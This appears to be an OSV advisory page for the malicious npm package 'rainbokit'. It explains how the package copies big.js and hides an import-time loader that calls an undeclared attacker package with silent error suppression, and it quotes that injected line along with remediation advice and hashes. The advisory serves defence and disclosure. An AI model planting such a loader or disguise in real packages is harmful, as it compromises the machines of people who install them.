MAL-2026-6339

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbokit/MAL-2026-6339.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6339
Aliases
  • GHSA-56vv-8v7m-r49g
Published
2026-06-23T20:01:22Z
Modified
2026-07-27T10:08:04Z
Summary
Malicious code in rainbokit (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555)

The package publishes as rainbokit but ships a verbatim copy of the legitimate big.js library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both big.js (~line 488) and big.mjs contain an injected block try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } inserted into the middle of the otherwise-unmodified big.js source. When a consumer does require('rainbokit') or import 'rainbokit', this block runs parket-slot.from_str() — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). parket-slot is not declared in dependencies; the only declared dependency is log-taker@^0.0.9, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves parket-slot and log-taker from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.

Source: ghsa-malware (7204dc005b10a97fd8238772232dc44e06a0369a20200b2b707d035cbb5f699c)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-007352",
            "import_time": "2026-06-23T20:48:30.343279355Z",
            "modified_time": "2026-06-23T20:01:22Z",
            "sha256": "692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555",
            "source": "amazon-inspector",
            "versions": [
                "0.0.8"
            ]
        },
        {
            "id": "GHSA-56vv-8v7m-r49g",
            "import_time": "2026-07-27T09:43:03.756993285Z",
            "modified_time": "2026-07-27T01:17:59Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "7204dc005b10a97fd8238772232dc44e06a0369a20200b2b707d035cbb5f699c",
            "source": "ghsa-malware"
        }
    ]
}
References
Credits

Affected packages

npm / rainbokit

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

0.*
0.0.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "big.js",
            "sha256": "5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace",
            "tlsh": "24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc"
        },
        {
            "path": "package.json",
            "sha256": "f27b0f0cf64e2f0fa98af800ba0c69165e32467f71217cea46b728ae47c6ef66",
            "tlsh": "c5210467c9a59da70af86ba47c6c03aaf1151b1f00a08c57b07b130c4b3355b2095bbd"
        }
    ],
    "package_integrity": [
        {
            "filename": "rainbokit-0.0.8.tgz",
            "hashes": {
                "sha1": "e107f63317c88d055fbd985080782ebfe649544f",
                "sha512_sri": "sha512-7Fg9gkQIbCKJn9Q19TIzfaRWCdfzYaqL0zUjnUoU5O0hPoAiL/0X6J/wBTlwQTdmKB1k7IZO2w5zC+gNlUsd0w=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbokit/MAL-2026-6339.json"